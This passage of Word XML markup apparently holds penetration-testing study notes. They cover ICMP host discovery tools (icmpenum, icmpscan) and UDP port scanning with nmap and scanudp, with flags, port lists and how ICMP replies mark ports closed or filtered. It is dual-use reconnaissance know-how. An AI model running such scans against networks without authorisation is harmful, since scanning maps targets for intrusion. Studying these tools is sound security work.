        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ICMP Echo, Timestamp, subnet mask requests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF4AD3" w:rsidRPr="00E50EC3" w:rsidRDefault="00885520" w:rsidP="001A3021">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:before="60"/>
        <w:ind w:left="3600" w:hanging="3600"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, -R</w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>no DNS resolution, always resolve (usefull for dead hosts).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00885520" w:rsidRPr="00E50EC3" w:rsidRDefault="00885520" w:rsidP="001A3021">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>--dns-servers &lt;server list&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>use these dns servers instead</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E50EC3" w:rsidRDefault="00E50EC3" w:rsidP="001A3021">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039512C" w:rsidRDefault="0039512C" w:rsidP="001A3021">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00885520" w:rsidRPr="00885520" w:rsidRDefault="00885520" w:rsidP="001A3021">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: on local LAN </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> will been done unless using --send-ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00885520">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF4AD3" w:rsidRDefault="00BF4AD3" w:rsidP="008B4568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001A3021" w:rsidRPr="00A331E7" w:rsidRDefault="0064093E" w:rsidP="00A331E7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A331E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>icmpenum</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="0064093E" w:rsidRPr="00E50EC3" w:rsidRDefault="0064093E" w:rsidP="00D31F27">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>icmp</w:t>
      </w:r>
      <w:r w:rsidR="0039512C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>enum</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c &lt;class c network&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">icmp echo request the class c </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0064093E" w:rsidRDefault="0064093E" w:rsidP="00D31F27">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-i2, -i3, -i4</w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0039512C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>timestamp, info</w:t>
      </w:r>
      <w:r w:rsidR="0039512C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> mask</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039512C" w:rsidRDefault="0039512C" w:rsidP="00D31F27">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039512C" w:rsidRPr="00A331E7" w:rsidRDefault="0039512C" w:rsidP="0039512C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>icmpscan</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (DaveA’s tools)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039512C" w:rsidRDefault="0039512C" w:rsidP="00D31F27">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039512C" w:rsidRPr="00E50EC3" w:rsidRDefault="0039512C" w:rsidP="00D31F27">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039512C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A3021" w:rsidRDefault="001A3021" w:rsidP="008B4568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F874AD" w:rsidRDefault="008B4568" w:rsidP="008B4568">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A331E7">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UDP </w:t>
      </w:r>
      <w:r w:rsidR="00E658EC" w:rsidRPr="00A331E7">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>scans</w:t>
      </w:r>
      <w:r w:rsidR="00A331E7">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A331E7" w:rsidRPr="00A331E7" w:rsidRDefault="00E9409A" w:rsidP="00A331E7">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00A331E7" w:rsidRPr="00A331E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A331E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - UDP relies on ICMP error messages being returned to identify closed ports. If an ICMP unreachable (type 3, code 3) is returned the ports is marked as closed. If </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A331E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A331E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ICMP unreachable (type 3, code </w:t>
      </w:r>
      <w:r w:rsidR="00A331E7" w:rsidRPr="00D31F27">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1, 2, 9, 10, or 13</w:t>
      </w:r>
      <w:r w:rsidR="00A331E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) the port is marked as filtered. UDP responses, when rarely encountered, denote open port all other ports are classed as open|filtered.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4568" w:rsidRPr="00D31F27" w:rsidRDefault="00F874AD" w:rsidP="00D31F27">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -n -sU -vv &lt;IPaddress&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">default </w:t>
      </w:r>
      <w:r w:rsidR="0045323A" w:rsidRPr="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1000 most common ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D31F27" w:rsidRDefault="00F874AD" w:rsidP="00D31F27">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="2880" w:hanging="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>–p &lt;port list&gt;</w:t>
      </w:r>
      <w:r w:rsidR="0045323A" w:rsidRPr="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D31F27" w:rsidRDefault="0045323A" w:rsidP="00D31F27">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="2880" w:hanging="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>quick</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan includes: </w:t>
      </w:r>
      <w:r w:rsidR="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>19,53,69,79,111,123,161,137,138,445,500,</w:t>
      </w:r>
      <w:r w:rsidR="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>514,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F874AD" w:rsidRPr="00D31F27" w:rsidRDefault="00D31F27" w:rsidP="00D31F27">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="2880" w:hanging="288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45323A" w:rsidRPr="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1434</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0045323A" w:rsidRPr="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,1900</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0045323A" w:rsidRPr="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5353</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0045323A" w:rsidRPr="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F874AD" w:rsidRPr="00D31F27" w:rsidRDefault="00F874AD" w:rsidP="00D31F27">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-p- </w:t>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Pr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D31F27" w:rsidRPr="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>all ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F874AD" w:rsidRPr="00A331E7" w:rsidRDefault="00F874AD" w:rsidP="00A331E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV  </w:t>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Pr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D31F27" w:rsidRPr="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">do version scan on list of </w:t>
      </w:r>
      <w:r w:rsidR="00D31F27">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>open/filtered only</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A331E7" w:rsidRDefault="00A331E7" w:rsidP="00A331E7">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D31F27" w:rsidRDefault="00D31F27" w:rsidP="00A331E7">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ScanUDP works by sending crafted UDP packets to well known services and awaits positive responses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A331E7" w:rsidRPr="00A331E7" w:rsidRDefault="00A331E7" w:rsidP="00A331E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A331E7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00D31F27" w:rsidRPr="00A331E7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>canudp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D31F27" w:rsidRPr="00A331E7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –v </w:t>
      </w:r>
      <w:r w:rsidRPr="00A331E7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;host&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00A331E7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
